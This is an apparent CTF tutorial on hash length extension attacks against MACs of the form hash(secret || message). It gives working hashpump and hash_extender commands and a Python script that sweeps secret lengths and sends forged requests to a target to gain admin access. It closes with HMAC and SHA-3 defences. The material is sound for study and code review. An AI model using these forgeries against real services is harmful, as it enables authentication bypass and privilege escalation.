Can you forge a MAC without knowing the secret?
If a service authenticates messages by computing signature = hash(secret || message) with a plain Merkle-Damgard hash (MD5, SHA-1, SHA-256), then yes. You can take a message and its valid signature, append your own bytes to the message, and compute a valid signature for the new, longer message without ever knowing the secret. This is the hash length extension attack, and it is one of the highest-reward bugs in CTF crypto and web categories because it looks like a real authentication scheme and is not one.
The digest of a Merkle-Damgard hash is not a fingerprint. It is a saved checkpoint of the machine. Hand someone the checkpoint and they can keep running the machine from where you stopped.
Everything you need to pull it off:
- The original message (the known, signed data).
- The original signature (the hex digest the server handed you).
- The bytes you want to append (for example &admin=true).
- The length of the secret in bytes. You do not know it, but you can brute force it in seconds.
Feed those to hashpump or hash_extender and the tool prints a new message and a new signature that the server will accept. The rest of this post explains why this works, how to run it, how to handle the unknown secret length, and why HMAC and SHA-3 make the whole attack disappear. If you want to first confirm which hash you are looking at, the on-site hash identifier tells you whether a digest is MD5, SHA-1, or SHA-256 from its length alone.
Why does a plain hash leak its own internal state?
MD5, SHA-1, and SHA-256 are all built on the Merkle-Damgard construction. The hash holds a fixed-size internal state (for SHA-256 that is eight 32-bit words, 256 bits total). It chops the input into fixed-size blocks (64 bytes for all three of these), and for each block it runs a compression function that mixes the block into the state. When the input runs out, it appends padding, processes the final block, and outputs the state as the digest.
The structure looks like this:
state = IV  # fixed initialization vector
for block in blocks(message + padding):
    state = compress(state, block)
digest = state  # <-- the output IS the final state
Read that last line again. The digest is a verbatim copy of the internal state after the last block. There is no final scrambling step that hides it, no key folded in at the end. So when the server hands you a hex digest, it has handed you the exact register contents the compression function would be sitting on if it were about to process one more block.
Resuming the machine also requires the number of bytes it has already processed, because the final padding encodes that count. The count is len(secret) + len(message) + len(original_padding), and the only unknown in it is the secret length. That single unknown is the entire difficulty of the attack, and it is small enough to brute force.

The padding is the other half of the trick, so it is worth seeing exactly. Merkle-Damgard padding (the "MD strengthening" scheme) appends a single 0x80 byte, then enough 0x00 bytes to bring the length to 56 mod 64, then the total bit length of the input as a 64-bit integer (big-endian for SHA-1 and SHA-256, little-endian for MD5), so the whole thing is a multiple of 64 bytes:
import struct

# message = b'COMMAND=getbalance' (18 bytes) with a 14-byte secret
# the hash actually processed: secret(14) || message(18) = 32 bytes of data
padding = b'\x80' + b'\x00' * 23 + struct.pack('>Q', 256)  # 32 bytes = 256 bits, big-endian length
#          glue byte   zero fill     64-bit big-endian bit length
# 32 data bytes + 32 padding bytes = 64 = exactly one block
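The same rule works for any input length. A minimal sketch, assuming a hash with 64-byte blocks; md_padding is a name chosen here for illustration, not a library function:

```python
import struct

def md_padding(data_len: int, little_endian: bool = False) -> bytes:
    """Glue padding for a 64-byte-block Merkle-Damgard hash over data_len bytes."""
    zeros = (55 - data_len) % 64                  # leaves exactly 8 bytes for the length field
    length_fmt = "<Q" if little_endian else ">Q"  # MD5 is little-endian; SHA-1/SHA-256 big-endian
    return b"\x80" + b"\x00" * zeros + struct.pack(length_fmt, 8 * data_len)

# the example above: 14-byte secret + b'COMMAND=getbalance' (18 bytes) = 32 bytes of data
glue = md_padding(14 + len(b"COMMAND=getbalance"))
print(len(glue), glue.hex())
```

The (55 - data_len) % 64 term is what makes the padding wrap into an extra block when fewer than 9 bytes remain in the current one.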
That padding (the 0x80, the zeros, and the length field) is called the glue padding. It is part of what got hashed to produce the signature you hold, so it becomes part of the message you forge. The server computed the digest over secret || message || glue_padding, a whole number of 64-byte blocks, and your forged message will contain that glue verbatim.
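To see the checkpoint idea without the details of SHA-256, here is a toy Merkle-Damgard hash. The compression function is a stand-in built from hashlib (an assumption for the demo, not how any real hash is defined), and toy_md, toy_compress and md_pad are hypothetical names. The point is that resuming from a digest, with only the secret's length known, reproduces the hash of the extended input:

```python
import hashlib
import struct

BLOCK = 64

def toy_compress(state: bytes, block: bytes) -> bytes:
    # stand-in compression function (NOT SHA-256's): any fixed-size mixer shows the idea
    return hashlib.sha256(state + block).digest()

def md_pad(total_len: int) -> bytes:
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", 8 * total_len)

def toy_md(data: bytes, state: bytes = bytes(32), already: int = 0) -> bytes:
    """Merkle-Damgard loop; `already` is how many bytes were absorbed before `data`."""
    padded = data + md_pad(already + len(data))
    for i in range(0, len(padded), BLOCK):
        state = toy_compress(state, padded[i:i + BLOCK])
    return state  # no finalization step: the digest IS the state

secret, msg, append = b"hypothetical-k", b"user=guest&role=user", b"&role=admin"
sig = toy_md(secret + msg)                  # what the server hands out
glue = md_pad(len(secret) + len(msg))       # the attacker only needs len(secret)
resumed = toy_md(append, state=sig, already=len(secret) + len(msg) + len(glue))
print(resumed == toy_md(secret + msg + glue + append))
```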
What exactly is the vulnerable pattern?
The bug is the construction MAC = hash(secret || message), where || is concatenation. A developer wants to stop clients from tampering with a query string, a cookie, or an API parameter, so they prepend a server-only secret and hash the whole thing. The client gets the message plus the hash. To verify, the server recomputes hash(secret || message) and compares.
It feels airtight. The client never sees the secret, and changing a single byte of the message produces a wildly different hash. The flaw is that the attacker does not need to keep the hash the same. They are allowed to extend the message, and the construction lets them compute the new hash for the extended message for free.
A canonical vulnerable endpoint looks like this:
GET /api?user=guest&role=user&mac=df3e... HTTP/1.1

# server side, in pseudo-python:
def verify(query, mac):
    expected = sha256(SECRET + query).hexdigest()  # secret || message
    return hmac_unsafe_equals(expected, mac)       # plain hash, not HMAC

# if it parses the LAST value of a repeated key, appending
#     &role=admin
# to the query overrides role=user, and length extension
# produces a mac the server will accept.
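A runnable toy version of that endpoint, assuming the server hashes the raw query bytes and keeps the last value of a repeated key. SECRET, sign, parse_params and handle are hypothetical names; hmac.compare_digest only does the equality check here, and the MAC itself is still the bare hash:

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

SECRET = b"hypothetical-k"  # stand-in for the server-only secret

def sign(query: bytes) -> str:
    # the vulnerable construction: sha256(secret || message)
    return hashlib.sha256(SECRET + query).hexdigest()

def parse_params(query: bytes) -> dict:
    # latin-1 maps every byte to one character, so glue bytes never raise;
    # dict() keeps the LAST value of a repeated key
    return dict(parse_qsl(query.decode("latin-1")))

def handle(query: bytes, mac: str):
    if not hmac.compare_digest(sign(query), mac):
        return None  # rejected
    return parse_params(query).get("role")

legit = b"user=guest&role=user"
print(handle(legit, sign(legit)))                   # user
print(handle(legit + b"&role=admin", sign(legit)))  # None: naive tampering fails
# illustrative glue bytes in the middle of the query do not stop the parser
print(parse_params(legit + b"\x80\x00\x00\x01\x20&role=admin")["role"])  # admin
```

Naive tampering fails because the MAC no longer matches; the only missing piece is a valid MAC for the glued query, which is exactly what length extension supplies.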
Two conditions have to hold. First, the secret must be prepended: hash(message || secret) is not vulnerable to this attack. Second, your appended bytes have to actually change the server's decision after it parses the message. The glue padding (raw 0x80 and null bytes) ends up in the middle of your forged message, so the parser has to tolerate or ignore it. Query strings, cookies, and many ad-hoc serialization formats do tolerate it.

How does length extension forge a valid MAC?
Here is the whole attack in one breath. The server computed signature = hash(secret || message). That signature is the hash's internal state right after it absorbed secret || message || glue_padding. You load that state back into a fresh hash object, tell it how many bytes it has "already" processed, and feed it your append bytes. The hash continues as if it had been computing secret || message || glue_padding || append all along, and it outputs a valid signature for exactly that string.
Step by step:
- Take the known signature and split it back into the hash's state words (8 words for SHA-256, 5 for SHA-1, 4 for MD5).
- Reconstruct the glue padding that the original secret || message input would have used. This needs the secret length, which you guess.
- Build the forged message as message || glue_padding || append. This is the data the server will think it signed.
- Resume the hash from the loaded state, with its length counter preset to len(secret) + len(message) + len(glue_padding) bytes, and absorb append. The output is the forged signature.
- Send forged_message and forged_signature to the server. It computes hash(secret || forged_message) and gets the same value, because that is exactly the computation you just continued.
A minimal hand-rolled version against SHA-1 makes the mechanism concrete. The helpers below stand in for a pure-Python SHA-1 implementation that exposes its internal state and processed-length counter; the real tools below do all of this for you, but seeing it once removes the magic:
# SHA1_from_state, set_processed_length and sha1_padding are hypothetical helpers
# standing in for any SHA-1 implementation that lets you load state and set the counter
orig_msg = b'user=guest&role=user'
orig_sig = '6b9e...'  # hex digest from the server (SHA-1, 40 chars)
append = b'&role=admin'
guess_len = 14  # guessed secret length in bytes

# 1) rebuild the glue padding the server's hash appended after secret || message
glue = sha1_padding(guess_len + len(orig_msg))

# 2) load the digest back into the SHA-1 state and preset the byte counter to
#    everything already absorbed: secret + message + glue (a multiple of 64)
h = SHA1_from_state(bytes.fromhex(orig_sig))
h.set_processed_length(guess_len + len(orig_msg) + len(glue))

# 3) absorb our bytes; the final padding now encodes the forged total length
h.update(append)
forged_sig = h.hexdigest()
forged_msg = orig_msg + glue + append

print(forged_msg)  # send this as the message
print(forged_sig)  # send this as the mac
Notice what never appears in that script: the secret's value. Only its length matters, and only because the length determines where the glue padding falls. The secret could be a 14-character passphrase or 14 bytes of random key material; the forgery is identical either way.
How do you run it with hashpump or hash_extender?
Nobody hand-rolls the state surgery in a CTF. Two tools own this attack: hash_extender (the reference implementation, supports MD4, MD5, RIPEMD-160, SHA-0, SHA-1, SHA-256, SHA-512, WHIRLPOOL) and hashpump (simpler interface, MD5 and the SHA family). Both take the same four inputs and print the forged message and forged signature.
hash_extender with explicit flags:
$ hash_extender \
    --data 'user=guest&role=user' \
    --secret 14 \
    --append '&role=admin' \
    --signature 6b9e1f...c0 \
    --format sha256 \
    --out-data-format html
Type: sha256
Secret length: 14
New signature: 2f5d9c7a...e41b
New string: user%3dguest%26role%3duser%80%00%00...%01%10%26role%3dadmin
The --out-data-format html flag URL-encodes the raw glue bytes so you can paste the result straight into a query string. Use hex if you need to post-process it, or cstr for a C-style escaped string. The New string line is your forged message, and New signature is the MAC to send alongside it.
hashpump does the same job with a terser interface:
# -s: original signature, --data: original message,
# -a: data to append, -k: key (secret) length in bytes
$ hashpump \
    -s 6b9e1f...c0 \
    --data 'user=guest&role=user' \
    -a '&role=admin' \
    -k 14
2f5d9c7a...e41b                              # forged signature (stdout line 1)
user=guest&role=user\x80\x00...&role=admin   # forged message (line 2)
hashpump infers the algorithm from the length of the signature you pass to -s: 32 hex chars means MD5, 40 means SHA-1, 64 means SHA-256. If you are not sure what you are holding, run it through the hash identifier first so you pick the right --format for hash_extender.

The output message contains literal high bytes (0x80 and nulls). When you put it on the wire, encode it the way the target expects: percent-encoding for URLs and cookies, raw bytes for a binary protocol. A mismatch here (sending the literal text \x80 instead of the byte) is the single most common reason a correct forgery gets rejected.
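A quick way to see the difference with Python's urllib.parse.quote; the glue here is shortened for illustration, and keeping = and & unencoded assumes the server parses the raw query string:

```python
from urllib.parse import quote

# forged message with the glue shortened for illustration (real glue is longer)
forged = b"user=guest&role=user" + b"\x80\x00\x00\x00" + b"&role=admin"

# right: percent-encode the raw bytes, keeping '=' and '&' so the query still parses
print(quote(forged, safe="=&"))  # user=guest&role=user%80%00%00%00&role=admin

# wrong: the four-character text \x80 instead of the single byte 0x80
print(quote(b"\\x80"))           # %5Cx80
```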
What if you do not know the secret length?
You usually do not. The secret length is the one unknown the attack needs, and it is bounded: almost every real secret is between 4 and 64 bytes. So you do not guess, you sweep. Generate a forgery for every candidate length, send each one, and keep the response the server accepts. One of them is correct, and the server itself tells you which.
A length sweep with hashpump driven from Python:
import subprocess
import urllib.parse

import requests

ORIG_SIG = '6b9e1f...c0'
ORIG_DATA = 'user=guest&role=user'
APPEND = '&role=admin'
URL = 'https://target.ctf/api'

for keylen in range(1, 65):  # sweep candidate secret lengths
    out = subprocess.run(
        ['hashpump', '-s', ORIG_SIG, '--data', ORIG_DATA,
         '-a', APPEND, '-k', str(keylen)],
        capture_output=True, text=True,
    ).stdout.splitlines()
    forged_sig = out[0]
    # hashpump prints non-printable bytes as \xNN escapes; turn them back into raw bytes
    forged_msg = out[1].encode().decode('unicode_escape').encode('latin-1')
    # percent-encode the glue bytes but keep '=' and '&' so the query still parses
    forged_qs = urllib.parse.quote(forged_msg, safe='=&')
    r = requests.get(f'{URL}?{forged_qs}&mac={forged_sig}')
    # match on a success marker only: many servers answer 200 even when they reject the MAC
    if 'Welcome admin' in r.text:
        print(f'[+] secret length = {keylen}')
        print(r.text)
        break
The same loop works with hash_extender by swapping the subprocess call for hash_extender --secret {keylen} ... and parsing its New signature / New string lines. Sixty-four requests is nothing; the sweep finishes faster than reading this paragraph.
Why are HMAC and SHA-3 immune?
The attack works because the digest equals the final internal state and you can resume from it. Kill either of those properties and the attack dies. HMAC and SHA-3 each kill one.
HMAC (defined in RFC 2104) wraps the hash in two keyed passes:
HMAC(K, m) = H( (K xor opad) || H( (K xor ipad) || m ) )
# inner hash: H((K xor ipad) || m)            -> produces a digest
# outer hash: H((K xor opad) || inner_digest) -> final MAC
Length extension needs the digest of the hash you want to continue, and the inner digest is never revealed: it is immediately fed through a second hash keyed with K xor opad. You do not know K, so even if you could extend the inner hash you could not compute the outer hash over the new inner digest, and the MAC the server checks is the outer one. Extending the outer digest you do see gets you nowhere either, because the result is not the HMAC of any message. The resumable state never reaches the output. That nested keyed structure is the entire reason HMAC exists, and it is why schemes such as JWT's HS256 and AWS Signature Version 4 use HMAC-SHA256 rather than SHA256(secret || message).
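The two passes are short enough to write out. This is a sketch for understanding only (hmac_sha256 is a hypothetical name; use hmac.new in real code), checked against Python's standard hmac module:

```python
import hashlib
import hmac

BLOCK_SIZE = 64  # SHA-256 block size in bytes

def hmac_sha256(key: bytes, msg: bytes) -> bytes:
    if len(key) > BLOCK_SIZE:
        key = hashlib.sha256(key).digest()  # RFC 2104: hash keys longer than a block
    key = key.ljust(BLOCK_SIZE, b"\x00")   # then zero-pad to the block size
    ipad_key = bytes(b ^ 0x36 for b in key)
    opad_key = bytes(b ^ 0x5C for b in key)
    inner = hashlib.sha256(ipad_key + msg).digest()   # H((K xor ipad) || m), never revealed
    return hashlib.sha256(opad_key + inner).digest()  # H((K xor opad) || inner), the MAC

print(hmac_sha256(b"key", b"msg") == hmac.new(b"key", b"msg", hashlib.sha256).digest())
```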
SHA-3 (Keccak) is immune for a different reason: it is not Merkle-Damgard at all. It uses a sponge construction with a large internal state, only part of which (the rate) is exposed as output; the rest (the capacity) is never revealed. The digest is not the full internal state, so you cannot reload the machine from it. Resuming is impossible because the bytes you would need to resume were never output. BLAKE2 and BLAKE3 are likewise immune, as are the truncated SHA-2 variants SHA-512/224 and SHA-512/256, because truncation hides part of the final state.
Length extension is not a weakness in SHA-256. It is a weakness in using SHA-256 as if it were a MAC. The fix is not a stronger hash; it is HMAC.
How do you defend against it (and spot it in review)?
The defense is one line. Never authenticate with a bare hash. Use HMAC with a dedicated key:
import hashlib
import hmac

# vulnerable
mac = hashlib.sha256(secret + message).hexdigest()

# safe
mac = hmac.new(secret, message, hashlib.sha256).hexdigest()

# verify in constant time, always
ok = hmac.compare_digest(mac, provided_mac)
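Wrapped into a pair of helpers, the fix might look like this; sign, verify and the key value are illustrative, not a prescribed API:

```python
import hashlib
import hmac

def sign(key: bytes, message: bytes) -> str:
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(key: bytes, message: bytes, provided_mac: str) -> bool:
    # compare_digest avoids leaking, through timing, how many leading characters matched
    return hmac.compare_digest(sign(key, message), provided_mac)

key = b"hypothetical server key"
mac = sign(key, b"user=guest&role=user")
print(verify(key, b"user=guest&role=user", mac))             # True
print(verify(key, b"user=guest&role=user&role=admin", mac))  # False
```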
Other constructions that close the hole, in rough order of preference: use HMAC (the default answer); switch to a length-extension-resistant hash like SHA-3, BLAKE2/BLAKE3, or a truncated SHA-512 variant; or, if you are stuck with a Merkle-Damgard hash and no HMAC, nest it as hash(secret || hash(secret || message)), which is essentially a hand-rolled HMAC. Appending the secret instead of prepending it also defeats length extension, but it leaves the MAC only as strong as the hash's collision resistance, which is broken for MD5 and SHA-1. The clean choice is always HMAC, because the others are easy to get subtly wrong.
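If you take the BLAKE2 route, note that it has a built-in keyed mode meant for MAC use, exposed in Python's hashlib through the key parameter of blake2b. A minimal sketch (blake2_mac and blake2_verify are hypothetical names):

```python
import hashlib
import hmac

def blake2_mac(key: bytes, message: bytes) -> str:
    # keyed BLAKE2b: the key (up to 64 bytes) is a hash parameter, not a message prefix
    return hashlib.blake2b(message, key=key, digest_size=32).hexdigest()

def blake2_verify(key: bytes, message: bytes, provided_mac: str) -> bool:
    return hmac.compare_digest(blake2_mac(key, message), provided_mac)

key = b"hypothetical 32-byte server key!"
tag = blake2_mac(key, b"user=guest&role=user")
print(blake2_verify(key, b"user=guest&role=user", tag))
```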
In code review, any line like sha256(secret + data), md5(key + msg), or sha1(SECRET . $payload) whose result is later treated as a signature is the smell. The tell is a hash whose input starts with a secret, with the result compared against client-supplied data. If you see it, you have found the bug.

Quick reference
Is it exploitable?
- The MAC is hash(secret || message) with MD5, SHA-1, or SHA-256 (check the digest length: 32, 40, or 64 hex chars).
- The secret is prepended, not appended. An appended secret is not vulnerable.
- You can see one valid (message, signature) pair.
- Your appended bytes (plus the raw glue padding) survive the server's parser and change its decision.
Tool cheat sheet
# hash_extender (explicit, many algorithms)
hash_extender --data DATA --secret LEN --append APP \
    --signature SIG --format sha256 --out-data-format html

# hashpump (terse, infers algo from signature length)
hashpump -s SIG --data DATA -a APP -k LEN

# unknown secret length? sweep 1..64 and let the server pick
for k in $(seq 1 64); do hashpump -s SIG --data DATA -a APP -k "$k"; done
For the neighboring techniques: recovering the secret behind a hash is the Hash Cracking guide; attacking signed web tokens and cookies is the Cookies and JWTs guide; and the symmetric encryption that often sits next to these MACs is the AES for CTF guide.
The whole attack fits on a sticky note: if a server signs with hash(secret || message), the signature is a checkpoint, and a checkpoint is an invitation to keep going.